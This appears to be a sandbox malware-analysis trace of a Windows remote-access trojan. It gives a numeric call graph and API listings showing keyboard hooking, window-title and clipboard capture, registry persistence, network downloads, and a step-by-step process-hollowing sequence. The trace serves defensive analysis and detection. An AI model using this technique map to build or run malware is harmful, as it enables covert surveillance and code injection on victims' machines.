39267->39275 39269 4120f4 39270 412274 39269->39270 39272 412125 39269->39272 39271 404468 3 API calls 39270->39271 39274 4121fc 39271->39274 39273 404468 3 API calls 39272->39273 39273->39274 39274->39255 39276 412406 39275->39276 39281 412435 39275->39281 39283 410b0d 39276->39283 39278 412444 39278->39269 39281->39278 39286 10001c5b 39281->39286 39291 410b19 39283->39291 39287 10001c6b ___scrt_fastfail 39286->39287 39342 100012ee 39287->39342 39289 10001c87 39289->39278 39290 410d8d SetLastError 39290->39281 39322 4105b9 39291->39322 39293 410b38 39294 410b15 39293->39294 39296 4105b9 SetLastError 39293->39296 39310 410c1f SetLastError 39293->39310 39294->39290 39298 410b5f 39296->39298 39297 410bbf GetNativeSystemInfo 39299 410bd6 39297->39299 39298->39294 39298->39297 39298->39298 39298->39310 39299->39310 39325 410abe VirtualAlloc 39299->39325 39301 410bfe 39302 410c26 GetProcessHeap RtlAllocateHeap 39301->39302 39335 410abe VirtualAlloc 39301->39335 39304 410c3d 39302->39304 39305 410c4f 39302->39305 39336 410ad5 VirtualFree 39304->39336 39308 4105b9 SetLastError 39305->39308 39306 410c16 39306->39302 39306->39310 39309 410c98 39308->39309 39311 410d45 39309->39311 39326 410abe VirtualAlloc 39309->39326 39310->39294 39337 410eb0 GetProcessHeap HeapFree 39311->39337 39314 410cb1 39327 4105cc SetLastError 39314->39327 39316 410cdd 39316->39311 39328 410975 SetLastError SetLastError 39316->39328 39318 410d04 39318->39311 39329 410769 39318->39329 39320 410d0f 39320->39294 39320->39311 39321 410d3a SetLastError 39320->39321 39321->39311 39323 4105c8 39322->39323 39324 4105bd SetLastError 39322->39324 39323->39293 39324->39293 39325->39301 39326->39314 39327->39316 39328->39318 39333 410790 39329->39333 39330 41087f 39331 4106d3 VirtualProtect 39330->39331 39332 410891 39331->39332 39332->39320 39333->39330 39333->39332 39338 4106d3 39333->39338 39335->39306 39336->39310 39337->39294 39339 4106dd 39338->39339 39341 4106e8 39338->39341 39340 410722 VirtualProtect 39339->39340 39339->39341 39340->39341 39341->39333 39343 10001324 ___scrt_fastfail 39342->39343 39344 100013b7 GetEnvironmentVariableW 39343->39344 39368 100010f1 39344->39368 39347 100010f1 57 API calls 39348 10001465 39347->39348 39349 100010f1 57 API calls 39348->39349 39350 10001479 39349->39350 39351 100010f1 57 API calls 39350->39351 39352 1000148d 39351->39352 39353 100010f1 57 API calls 39352->39353 39354 100014a1 39353->39354 39355 100010f1 57 API calls 39354->39355 39356 100014b5 lstrlenW 39355->39356 39357 100014d9 lstrlenW 39356->39357 39367 100014d2 39356->39367 39358 100010f1 57 API calls 39357->39358 39359 10001501 lstrlenW lstrcatW 39358->39359 39360 100010f1 57 API calls 39359->39360 39361 10001539 lstrlenW lstrcatW 39360->39361 39362 100010f1 57 API calls 39361->39362 39363 1000156b lstrlenW lstrcatW 39362->39363 39364 100010f1 57 API calls 39363->39364 39365 1000159d lstrlenW lstrcatW 39364->39365 39366 100010f1 57 API calls 39365->39366 39366->39367 39367->39289 39369 10001118 ___scrt_fastfail 39368->39369 39370 10001129 lstrlenW 39369->39370 39381 10002c40 39370->39381 39373 10001177 lstrlenW FindFirstFileW 39375 100011a0 39373->39375 39376 100011e1 39373->39376 39374 10001168 lstrlenW 39374->39373 39377 100011c7 FindNextFileW 39375->39377 39378 100011aa 39375->39378 39376->39347 39377->39375 39380 100011da FindClose 39377->39380 39378->39377 39383 10001000 57 API calls ___scrt_fastfail 39378->39383 39380->39376 39382 10001148 lstrcatW lstrlenW 39381->39382 39382->39373 39382->39374 39383->39378 39406 401fbd 39384->39406 39386 414bbd SetEvent 39387 414bd2 39386->39387 39388 414d8f 39387->39388 39389 414c37 GetTickCount 39387->39389 39405 414d8a 39387->39405 39390 414dad 39388->39390 39388->39405 39391 414c4d 39389->39391 39422 404ab1 CreateEventA SetEvent WaitForSingleObject CloseHandle GetLocalTime 39390->39422 39408 41aca0 GetLastInputInfo GetTickCount 39391->39408 39394 414d7d 39394->39405 39395 414c54 39409 41ac52 39395->39409 39397 414c6d 39398 404468 3 API calls 39397->39398 39399 414ce9 39398->39399 39399->39388 39400 414d69 39399->39400 39401 414d82 39400->39401 39402 414d77 39400->39402 39413 404915 39401->39413 39412 4049ba GetLocalTime GetLocalTime GetLocalTime 39402->39412 39407 401fcc 39406->39407 39407->39386 39408->39395 39410 41ac71 GetForegroundWindow GetWindowTextW 39409->39410 39411 41ac9b 39410->39411 39411->39397 39412->39394 39414 4049b1 39413->39414 39415 40492a 39413->39415 39414->39405 39416 404933 39415->39416 39417 404987 CreateEventA CreateThread 39415->39417 39418 404942 GetLocalTime 39415->39418 39416->39417 39417->39414 39423 404b1d 39417->39423 39419 40495b 39418->39419 39420 41a686 GetLocalTime 39419->39420 39421 40497c 39420->39421 39421->39417 39422->39394 39426 404b29 11 API calls 39423->39426 39425 404b26 39426->39425 39427->39239 39428->39248 39429 414dba 39434 41a51b 39429->39434 39431 414dc3 39432 404468 3 API calls 39431->39432 39433 414dde 39432->39433 39435 41a529 39434->39435 39441 446aff 21 API calls 39435->39441 39436 41a533 InternetOpenW InternetOpenUrlW 39437 41a55c InternetReadFile 39436->39437 39439 41a57f 39437->39439 39438 41a5ac 39442 446ac5 20 API calls 39438->39442 39439->39437 39439->39438 39440 41a5be 39440->39431 39441->39436 39442->39440 39443 4339be 39444 4339ca CallCatchBlock 39443->39444 39479 4336b3 39444->39479 39446 4339d1 39447 433b24 39446->39447 39450 4339fb 39446->39450 39597 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 39447->39597 39449 433b2b 39598 4426be 28 API calls _Atexit 39449->39598 39462 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 39450->39462 39591 4434d1 5 API calls ___crtLCMapStringA 39450->39591 39452 433b31 39599 442670 28 API calls _Atexit 39452->39599 39455 433a14 39457 433a1a 39455->39457 39592 443475 5 API calls ___crtLCMapStringA 39455->39592 39456 433b39 39600 43405d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 39456->39600 39460 433b3f __scrt_common_main_seh 39461 433a9b 39490 433c5e 39461->39490 39462->39461 39593 43edf4 38 API calls 3 library calls 39462->39593 39468 433ab6 39594 433c94 GetModuleHandleW 39468->39594 39470 433abd 39470->39449 39471 433ac1 39470->39471 39472 433aca 39471->39472 39595 442661 28 API calls _Atexit 39471->39595 39596 433842 13 API calls 2 library calls 39472->39596 39475 433ad2 39475->39457 39480 4336bc 39479->39480 39601 433e0a IsProcessorFeaturePresent 39480->39601 39482 4336c8 39602 4379ee 10 API calls 3 library calls 39482->39602 39484 4336cd 39489 4336d1 39484->39489 39603 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39484->39603 39486 4336e8 39486->39446 39487 4336da 39487->39486 39604 437a17 8 API calls 3 library calls 39487->39604 39489->39446 39605 436050 39490->39605 39492 433c71 GetStartupInfoW 39493 433aa1 39492->39493 39494 443422 39493->39494 39606 44ddc9 39494->39606 39496 433aaa 39499 40d767 39496->39499 39584 40bed7 39496->39584 39587 40697b 39496->39587 39497 44342b 39497->39496 39610 44e0d3 38 API calls 39497->39610 39612 41bce3 LoadLibraryA 39499->39612 39503 40d7eb 39503->39468 39504 40d9a4 39505 40bed7 2 API calls 39504->39505 39507 40d9aa 39505->39507 39506 40d946 39506->39504 39508 4124b7 3 API calls 39506->39508 39513 40e134 39506->39513 39507->39503 39619 41a463 39507->39619 39514 40d988 39508->39514 39509 40d79f 39509->39503 39509->39506 39693 4124b7 RegOpenKeyExA 39509->39693 39512 40d9c5 39517 40697b 3 API calls 39512->39517 39521 40da18 39512->39521 39724 412902 RegOpenKeyExW RegDeleteValueW 39513->39724 39514->39504 39696 412902 RegOpenKeyExW RegDeleteValueW 39514->39696 39519 40d9e0 39517->39519 39518 40e14a 39725 4112b5 35 API calls 39518->39725 39522 40d9e4 39519->39522 39529 40d9ee 39519->39529 39525 40da2d 39521->39525 39536 40da32 39521->39536 39697 40699d RegOpenKeyExW RegDeleteValueW 39522->39697 39700 4069ba CreateProcessA 39525->39700 39526 40d9e9 39698 4064d0 6 API calls 39526->39698 39529->39521 39530 40da13 39529->39530 39699 4064d0 6 API calls 39530->39699 39532 40db08 39533 40db2c 39532->39533 39534 40dcaa 39532->39534 39538 40db35 39533->39538 39540 40dbb1 39533->39540 39715 41265d RegOpenKeyExA 39534->39715 39536->39532 39701 40c89e 39536->39701 39713 40bc67 53 API calls 39538->39713 39539 40dcef 39632 4126d2 RegCreateKeyA 39539->39632 39628 4128a2 39540->39628 39544 40dbac 39544->39540 39545 40dc45 39545->39539 39550 40dc70 39545->39550 39546 40dd3b 39547 40dd5e 39546->39547 39551 40dd81 39546->39551 39718 41beb0 8 API calls 39547->39718 39549 40dd65 39549->39551 39714 40e219 63 API calls 39550->39714 39555 41a686 GetLocalTime 39551->39555 39553 40dc8c 39553->39539 39554 40dc93 39553->39554 39554->39503 39556 40ddaa 39555->39556 39557 40de41 StrToIntA 39556->39557 39636 409517 39557->39636 39559 40df46 39560 40dfba 39559->39560 39567 40df81 39559->39567 39645 41a7a2 GetComputerNameExW GetUserNameW 39560->39645 39562 40de53 39562->39559 39719 40c854 39562->39719 39564 40dfc3 39565 40dfe0 SetProcessDEPPolicy 39564->39565 39566 40dfe3 CreateThread 39564->39566 39565->39566 39571 40dff8 39566->39571 39885 40e54f 39566->39885 39723 40b95c 7 API calls 39567->39723 39569 40e067 39647 41246e RegOpenKeyExA 39569->39647 39571->39569 39575 41a686 GetLocalTime 39571->39575 39574 40e08b 39583 40e117 39574->39583 39650 412584 RegOpenKeyExW 39574->39650 39575->39569 39578 40e0ba 39579 40e0db Sleep 39578->39579 39581 40e0f4 39578->39581 39580 401e07 39579->39580 39580->39578 39653 41297a RegOpenKeyExW 39581->39653 39657 40cbac 39583->39657 39904 401e8f 39584->39904 39586 40bee1 CreateMutexA GetLastError 39586->39468 39588 40698f 39587->39588 39589 4124b7 3 API calls 39588->39589 39590 406996 39589->39590 39590->39468 39591->39455 39592->39462 39593->39461 39594->39470 39595->39472 39596->39475 39597->39449 39598->39452 39599->39456 39600->39460 39601->39482 39602->39484 39603->39487 39604->39489 39605->39492 39607 44dddb 39606->39607 39608 44ddd2 39606->39608 39607->39497 39611 44dcc8 51 API calls 5 library calls 39608->39611 39610->39497 39611->39607 39613 41bd03 LoadLibraryA 39612->39613 39615 40d783 GetModuleFileNameW 39613->39615 39616 40e168 39615->39616 39726 41a63f FindResourceA 39616->39726 39618 40e183 39618->39509 39729 41b15b 39619->39729 39621 41a471 39733 412513 RegOpenKeyExA 39621->39733 39623 41a48f 39624 412513 3 API calls 39623->39624 39627 41a4e6 39623->39627 39625 41a4cd 39624->39625 39626 41a4d8 StrToIntA 39625->39626 39626->39627 39627->39512 39629 4128c0 39628->39629 39630 4126d2 3 API calls 39629->39630 39631 4128ef 39630->39631 39631->39545 39633 412722 39632->39633 39634 4126eb 39632->39634 39633->39546 39635 4126fd RegSetValueExA RegCloseKey 39634->39635 39635->39633 39637 409536 39636->39637 39638 409541 39637->39638 39639 409558 39637->39639 39640 40c89e 43 API calls 39638->39640 39641 40c89e 43 API calls 39639->39641 39642 409549 39640->39642 39641->39642 39736 409837 39642->39736 39646 41a7f1 39645->39646 39646->39564 39648 4124ae 39647->39648 39649 41248f RegQueryValueExA RegCloseKey 39647->39649 39648->39574 39649->39648 39651 4125b0 RegQueryValueExW RegCloseKey 39650->39651 39652 4125dd 39650->39652 39651->39652 39652->39578 39654 412992 RegDeleteValueW 39653->39654 39655 4129a6 39653->39655 39654->39655 39656 4129a2 39654->39656 39655->39583 39656->39583 39658 40cbc5 39657->39658 39659 41246e 3 API calls 39658->39659 39661 40cbcc 39659->39661 39660 40cbeb 39663 413fd4 39660->39663 39661->39660 39834 4127d5 RegCreateKeyA 39661->39834 39664 413feb 39663->39664 39665 414021 Sleep 39664->39665 39666 41402e 39664->39666 39665->39666 39837 404262 WSAStartup 39666->39837 39668 414065 39691 4140ed 39668->39691 39856 404101 GetLocalTime 39668->39856 39670 41a686 GetLocalTime 39670->39691 39672 414244 WSAGetLastError 39857 41bc76 FormatMessageA LocalFree 39672->39857 39673 4041f1 3 API calls 39673->39691 39675 404915 14 API calls 39675->39691 39676 40428c 5 API calls 39676->39691 39677 4047eb 8 API calls 39677->39691 39678 414b80 Sleep 39678->39691 39680 41265d 3 API calls 39680->39691 39681 412513 3 API calls 39681->39691 39683 4144ed GetTickCount 39683->39691 39685 41ac52 2 API calls 39685->39691 39687 404468 3 API calls 39687->39691 39688 4045d5 191 API calls 39688->39691 39689 414ae4 39689->39678 39858 40a767 6 API calls 39689->39858 39691->39670 39691->39672 39691->39673 39691->39675 39691->39676 39691->39677 39691->39680 39691->39681 39691->39683 39691->39685 39691->39687 39691->39688 39691->39689 39692 414b22 CreateThread 39691->39692 39838 413f9a 39691->39838 39844 41a96d 39691->39844 39847 40cbf1 39691->39847 39853 41aca0 GetLastInputInfo GetTickCount 39691->39853 39854 40e679 GetLocaleInfoA 39691->39854 39692->39691 39861 419e89 54 API calls 39692->39861 39694 4124e1 RegQueryValueExA RegCloseKey 39693->39694 39695 41250b 39693->39695 39694->39695 39695->39506 39696->39504 39697->39526 39698->39529 39699->39521 39700->39536 39702 40c8ba 39701->39702 39703 40c9c9 39702->39703 39704 40c8da 39702->39704 39705 40c90f 39702->39705 39710 40c8d0 39702->39710 39862 43a998 39703->39862 39875 41a74b GetModuleFileNameW 39704->39875 39707 41b15b 2 API calls 39705->39707 39706 40ca03 GetLongPathNameW 39711 40ca18 39706->39711 39707->39710 39709 40c8e3 39709->39710 39710->39706 39711->39532 39713->39544 39714->39553 39716 412683 RegQueryValueExA RegCloseKey 39715->39716 39717 4126a7 39715->39717 39716->39717 39717->39539 39718->39549 39720 40c86b 39719->39720 39721 40c89e 43 API calls 39720->39721 39722 40c887 39721->39722 39722->39559 39723->39560 39724->39518 39727 41a683 39726->39727 39728 41a65c LoadResource LockResource SizeofResource 39726->39728 39727->39618 39728->39727 39730 41b183 39729->39730 39731 41b168 GetCurrentProcess IsWow64Process 39729->39731 39730->39621 39731->39730 39732 41b17f 39731->39732 39732->39621 39734 412541 RegQueryValueExA RegCloseKey 39733->39734 39735 412569 39733->39735 39734->39735 39735->39623 39737 409855 39736->39737 39738 4124b7 3 API calls 39737->39738 39739 40985c 39738->39739 39740 409870 39739->39740 39741 40988a 39739->39741 39742 4095cf 39740->39742 39743 409875 39740->39743 39747 4098a5 39741->39747 39742->39562 39758 409959 CreateThread 39743->39758 39746 409888 39746->39742 39748 4098c3 39747->39748 39749 4098ce 39748->39749 39750 4098f6 39748->39750 39759 40a876 SetEvent GetLocalTime wsprintfW 39749->39759 39752 41a686 GetLocalTime 39750->39752 39754 409915 CreateThread 39752->39754 39753 4098ed 39753->39750 39755 409930 CreateThread 39754->39755 39756 40993c CreateThread 39754->39756 39766 4099a9 39754->39766 39755->39756 39763 409993 39755->39763 39757 409950 39756->39757 39760 4099b5 39756->39760 39757->39742 39758->39746 39833 40999f 47 API calls 39758->39833 39759->39753 39769 40a3f4 39760->39769 39762 4099be 39782 4099e4 39763->39782 39765 40999c 39790 409e48 39766->39790 39779 40a402 39769->39779 39770 40a5ff 39770->39762 39771 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 39771->39779 39773 40a4a2 GetWindowTextW 39773->39779 39774 41aca0 GetLastInputInfo GetTickCount 39774->39779 39775 40a569 Sleep 39775->39779 39776 40a4f1 39776->39779 39780 40a876 SetEvent GetLocalTime wsprintfW 39776->39780 39778 409d58 SetEvent 39778->39779 39779->39770 39779->39771 39779->39773 39779->39774 39779->39775 39779->39776 39779->39778 39781 40ae58 SetEvent OpenClipboard GetClipboardData CloseClipboard 39779->39781 39780->39776 39781->39779 39783 409a63 GetMessageA 39782->39783 39784 4099ff GetModuleHandleA SetWindowsHookExA 39782->39784 39785 409a75 TranslateMessage DispatchMessageA 39783->39785 39789 409a52 39783->39789 39784->39783 39786 409a1b GetLastError 39784->39786 39785->39783 39785->39789 39787 409a31 39786->39787 39788 41a686 GetLocalTime 39787->39788 39788->39789 39789->39765 39791 409e5d Sleep 39790->39791 39804 409d97 39791->39804 39793 4099b2 39794 409e9d CreateDirectoryW 39797 409e6f 39794->39797 39795 409eae GetFileAttributesW 39795->39797 39796 409ec5 SetFileAttributesW 39796->39797 39797->39791 39797->39793 39797->39794 39797->39795 39797->39796 39803 409f10 39797->39803 39815 41b58f 39797->39815 39799 409f3f PathFileExistsW 39799->39803 39801 40a048 SetFileAttributesW 39801->39797 39803->39797 39803->39799 39803->39801 39824 41b61a CreateFileW 39803->39824 39831 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 39803->39831 39805 409e44 39804->39805 39807 409dad 39804->39807 39805->39797 39806 409dcc CreateFileW 39806->39807 39808 409dda GetFileSize 39806->39808 39807->39806 39809 409e0f CloseHandle 39807->39809 39810 409e04 Sleep 39807->39810 39811 409dfd 39807->39811 39813 409e21 39807->39813 39808->39807 39808->39809 39809->39807 39810->39809 39832 40a7f0 SetEvent UnhookWindowsHookEx GetLocalTime wsprintfW GetLocalTime 39811->39832 39813->39805 39814 4098a5 38 API calls 39813->39814 39814->39805 39816 41b5a2 CreateFileW 39815->39816 39818 41b5df 39816->39818 39819 41b5db 39816->39819 39820 41b5f6 WriteFile 39818->39820 39821 41b5e6 SetFilePointer 39818->39821 39819->39797 39822 41b60b CloseHandle 39820->39822 39823 41b609 39820->39823 39821->39820 39821->39822 39822->39819 39823->39822 39825 41b644 GetFileSize 39824->39825 39826 41b640 39824->39826 39827 41b658 39825->39827 39826->39803 39828 41b66a ReadFile 39827->39828 39829 41b677 39828->39829 39830 41b679 CloseHandle 39828->39830 39829->39830 39830->39826 39831->39803 39832->39810 39835 412814 39834->39835 39836 4127ed RegSetValueExA RegCloseKey 39834->39836 39835->39660 39836->39835 39837->39668 39839 413fb3 WSASetLastError 39838->39839 39840 413fa9 39838->39840 39839->39691 39859 413e37 GetSystemDirectoryA LoadLibraryA LoadLibraryA GetProcAddress 39840->39859 39843 413fae 39843->39839 39860 41a945 GlobalMemoryStatusEx 39844->39860 39846 41a982 39846->39691 39848 40cc0d 39847->39848 39849 41246e 3 API calls 39848->39849 39851 40cc14 39849->39851 39850 40cc2c 39850->39691 39851->39850 39852 4124b7 3 API calls 39851->39852 39852->39850 39853->39691 39855 40e69e 39854->39855 39855->39691 39856->39691 39857->39691 39858->39691 39859->39843 39860->39846 39865 43a9a4 CallCatchBlock 39862->39865 39863 43a9b2 39881 445354 20 API calls _Atexit 39863->39881 39865->39863 39867 43a9dc 39865->39867 39866 43a9b7 39882 43a827 26 API calls pre_c_initialization 39866->39882 39876 444acc RtlEnterCriticalSection 39867->39876 39870 43a9e7 39877 43aa88 39870->39877 39873 43a9c2 _Xfiopen 39873->39710 39875->39709 39876->39870 39878 43aa96 39877->39878 39880 43a9f2 39878->39880 39884 448416 39 API calls 2 library calls 39878->39884 39883 43aa0f RtlLeaveCriticalSection std::_Lockit::~_Lockit 39880->39883 39881->39866 39882->39873 39883->39873 39884->39878 39887 40e56a 39885->39887 39886 4124b7 3 API calls 39886->39887 39887->39886 39888 40e5fe Sleep 39887->39888 39891 40e60e 39887->39891 39895 40e59c 39887->39895 39888->39887 39902 412774 RegCreateKeyW RegSetValueExW RegCloseKey 39891->39902 39893 40e638 39896 4126d2 3 API calls 39893->39896 39894 4126d2 3 API calls 39894->39895 39895->39888 39895->39894 39900 40bf04 30 API calls 39895->39900 39901 412774 RegCreateKeyW RegSetValueExW RegCloseKey 39895->39901 39897 40e668 39896->39897 39903 411699 TerminateProcess WaitForSingleObject 39897->39903 39899 40e670 ExitProcess 39901->39895 39902->39893 39903->39899 39905 401e94 39904->39905 39905->39586 39906 43360d 39907 433612 39906->39907 39908 43362c 39907->39908 39911 43362e std::_Facet_Register 39907->39911 39915 442200 7 API calls 2 library calls 39907->39915 39910 433dec std::_Facet_Register 39917 437bd7 RaiseException 39910->39917 39911->39910 39916 437bd7 RaiseException 39911->39916 39914 433e09 39915->39907 39916->39910 39917->39914

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 909 417245-417262 910 417266-4172d9 909->910 919 4175cd 910->919 920 4172df-4172e6 910->920 921 4175cf-4175d9 919->921 920->919 922 4172ec-4172f3 920->922 922->919 923 4172f9-4172fb 922->923 923->919 924 417301-41732d 923->924 924->919 927 417333-41733e 924->927 927->919 928 417344-417374 CreateProcessW 927->928 929 4175c7 GetLastError 928->929 930 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 928->930 929->919 931 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 930->931 932 4173a8-4173c8 ReadProcessMemory 930->932 931->919 932->931 933 4173ce-4173ee NtCreateSection 932->933 933->931 934 4173f4-417401 933->934 935 417403-41740e NtUnmapViewOfSection 934->935 936 417414-417436 NtMapViewOfSection 934->936 935->936 937 417477-41749e GetCurrentProcess NtMapViewOfSection 936->937 938 417438-417466 VirtualFree NtClose TerminateProcess 936->938 940 417591 937->940 941 4174a4-4174a6 937->941 938->919 939 41746c-417472 938->939 939->910 940->931 942 4174a8-4174ac 941->942 943 4174af-4174d6 941->943 942->943 945 417516-417520 943->945 946 4174d8-4174e2 943->946 948 417522-417528 945->948 949 41753e-417542 945->949 947 4174e6-417509 946->947 958 41750b-417512 947->958 948->949 950 41752a-41753b call 417651 948->950 951 417544-417560 WriteProcessMemory 949->951 952 417566-41757d Wow64SetThreadContext 949->952 950->949 951->931 955 417562 951->955 952->931 956 41757f-41758b ResumeThread 952->956 955->952 956->931 957 41758d-41758f 956->957 957->921 958->945
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                                                              • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                                                                                                                              • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Section$View$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                                                                              • String ID: ntdll
                                                                                                                                                                                                                              • API String ID: 2813502504-3337577438
                                                                                                                                                                                                                              • Opcode ID: bed19215e1ee462be55f0caaedf1beca1b54ad8a9f8af9374d2a49f9eda5156c
                                                                                                                                                                                                                              • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bed19215e1ee462be55f0caaedf1beca1b54ad8a9f8af9374d2a49f9eda5156c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1420 4099e4-4099fd 1421 409a63-409a73 GetMessageA 1420->1421 1422 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1420->1422 1423 409a75-409a8d TranslateMessage DispatchMessageA 1421->1423 1424 409a8f 1421->1424 1422->1421 1425 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1422->1425 1423->1421 1423->1424 1426 409a91-409a96 1424->1426 1425->1426
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                                                                                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                                                              • String ID: @[F
                                                                                                                                                                                                                              • API String ID: 3219506041-1227568360
                                                                                                                                                                                                                              • Opcode ID: c438af23d4f15268833374318afe33104a09b36a87c9297105c599c56c6441db
                                                                                                                                                                                                                              • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c438af23d4f15268833374318afe33104a09b36a87c9297105c599c56c6441db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1437 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1444 10001177-1000119e lstrlenW FindFirstFileW 1437->1444 1445 10001168-10001172 lstrlenW 1437->1445 1446 100011a0-100011a8 1444->1446 1447 100011e1-100011e9 1444->1447 1445->1444 1448 100011c7-100011d8 FindNextFileW 1446->1448 1449 100011aa-100011c4 call 10001000 1446->1449 1448->1446 1451 100011da-100011db FindClose 1448->1451 1449->1448 1451->1447
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
